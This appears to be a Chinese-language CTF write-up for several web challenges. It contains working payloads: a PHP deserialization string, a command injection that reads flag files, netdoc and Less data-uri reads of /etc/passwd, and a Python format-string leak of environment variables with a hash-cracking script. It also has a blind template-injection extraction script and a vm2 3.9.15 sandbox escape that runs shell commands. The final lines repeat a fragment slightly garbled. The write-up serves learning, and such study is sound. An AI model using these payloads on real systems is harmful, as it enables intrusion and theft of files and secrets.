反序列化tostring打Hack类
Payload:O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A6%3A%22Hacker%22%3A2%3A%7Bs%3A11%3A%22%00Hacker%00exp%22%3BN%3Bs%3A11%3A%22%00Hacker%00cmd%22%3BN%3B%7D%7D
这题发现 backdoor_[a-f0-9]{16}.php 这个
想到了glob://(glob:// — 查找匹配的文件路径模式)
然后写过python脚本爆破路径
import requests
url = "http://172.10.0.5/"
Harder = "abcdef0123456789."
target = "glob://backdoor_"
for i in range(1,66):
for j in Harder:
poc = target +str(j) +"*"
payload ={
"filename":poc
}
# print(j)
req = requests.post(url=url,data=payload)
if "yesyesyes!!!" in req.text:
tar_file = target +str(j)
print(tar_file)
break
else:
print("nonononono")
/backdoor_00fbc51dcdf9eef767597fd26119a894.php
<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['username'])){
$sandbox = '/var/www/html/sandbox/'.md5("5050f6511ffb64e1914be4ca8b9d585c".$_GET['username']).'/';
mkdir($sandbox);
chdir($sandbox);
if(isset($_GET['title'])&&isset($_GET['data'])){
$data = $_GET['data'];
$title= $_GET['title'];
if (strlen($data)>5||strlen($title)>3){
die("no!no!no!");
}
file_put_contents($sandbox.$title,$data);
if (strlen(file_get_contents($title)) <= 10) {
system('php '.$sandbox.$title);
}
else{
system('rm '.$sandbox.$title);
die("no!no!no!");
}
}
else if (isset($_GET['reset'])) {
system('/bin/rm -rf ' . $sandbox);
}
}
?>
简单的绕过,数组绕过
/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=admin&title[]=1.php&data[]=%3C?=`cat%20/f*`;
这题通过扫描路由发现有这个/proxy/url路由传url参数
尝试了ssrf,也没有请求走私,就去谷歌搜索了一下,发现有netdoc可以读文件
file协议也可以读
url:netdoc即可绕过过滤
/proxy/url?url=url%3Anetdoc%3A%2Fflag%23.html
这题是原题,原题是有两种解法但是这题不行,首先我不知道secret.html里面是否有flag,二是原题里面的长度长度为7,而这题的长度为16,需要爆破10的16次方,爆破这条路肯定走不通了
贴一手第一种解法改的脚本:
import requests
import os
# hashcat -m 1700 -a 0 hash password.txt --show
payload = '{passhash.__str__.__globals__[passhash]}'
url = "http://172.10.0.5:10000/?username=%s&password=anything" % payload
r = requests.get(url)
output = r.text
hash_start = output.find("user '") + len("user '")
hash_end = output.find("'", hash_start)
admin_hash = output[hash_start:hash_end]
with open("hash", "w") as f:
f.write(admin_hash)
print(admin_hash)
def create_salt_wordlist():
with open('wordlist.txt', 'w') as f:
for i in range(10000000000000000):
padded_number = str(i).zfill(16)
salted_string = "****************" + padded_number
f.write(salted_string + "\n")
print("Created salt wordlist in wordlist.txt")
create_salt_wordlist()
def crack_hash():
choose_tool = input("""1.Hashcat \n2.John_The_Ripper \nWhat tool do you want to use to crack?: """)
if choose_tool == "1":
hashcat = "hashcat -m 1700 -a 0 hash wordlist.txt"
hashcat_output = os.system(hashcat)
print(hashcat_output)
if choose_tool == "2":
john_the_ripper = "john --format=raw-sha512 --wordlist=wordlist.txt hash"
john_the_ripper_output = os.system(john_the_ripper)
print(john_the_ripper_output)
elif choose_tool != "1" and "2":
print("Error")
crack_hash()
print("After you get cracked password remove the `very_secure_salt` since it will always contains by default in app and take the numbers behind as password and login with it")
那我们就第二种解法,格式化字符串漏洞获取环境变量
username=%7Bpasshash.__str__.__globals__%5Bapp%5D.wsgi_app.__globals__%5Bos%5D.environ%7D&password=1
这题直接上脚本
import requests
res=''
j=5
while True:
j+=1
for i in range(32,127):
data=f"""
{{% set res = get_env(name="fl"~"ag") %}}
{{%- if res|truncate(length={j},end='') == 'fla'~'g{{'~'{res+chr(i)}' -%}}
www
{{%- endif -%}}
"""
r=requests.post(url="http://172.10.0.3:8081/",data=data)
s=r.text
if "www" in s:
res+=chr(i)
print("flag{"+res)
break
这题支持less模板
参考:https://mp.weixin.qq.com/s/EqEyEDKpzxS5BYA_t74p9A
https://www.yuque.com/dat0u/ctf/gupiindgyz7vodib#UIsP7
vm2 3.9.15逃逸
.test {
content: data-uri('/etc/passwd');
}
读取文件的payload
读一下文件
● /app/app.js
● /app/rpc.js
● /app/eval.proto
● /app/package.json
然后发现vm2为3.9.15版本的
var grpc = require('@grpc/grpc-js');
var protoLoader = require('@grpc/proto-loader');
var PROTO_PATH = __dirname + '/eval.proto';
var packageDefinition = protoLoader.loadSync(
PROTO_PATH,
{keepCase: true,
longs: String,
enums: String,
defaults: true,
oneofs: true
});
var hello_proto = grpc.loadPackageDefinition(packageDefinition).helloworld;
function main() {
var client = new hello_proto.Demo('172.10.0.6:8082', grpc.credentials.createInsecure())
client.evalTemplate({ message: 'Hello',template: `aVM2_INTERNAL_TMPNAME = {};
function stack() {
new Error().stack;
stack();
}
try {
stack();
} catch (a$tmpname) {
a$tmpname.constructor.constructor('return process')().mainModule.require('child_process').execSync('/readflag');
}` }, function(err, response) {
if (err) {
console.error('Error: ', err)
} else {
console.log(response)
}
})
}
main()
).mainModule.require(‘child_process’).execSync(‘/readflag’);
}` }, function(err, response) {
if (err) {
console.error('Error: ', err)
} else {
console.log(response)
}
})
}
main()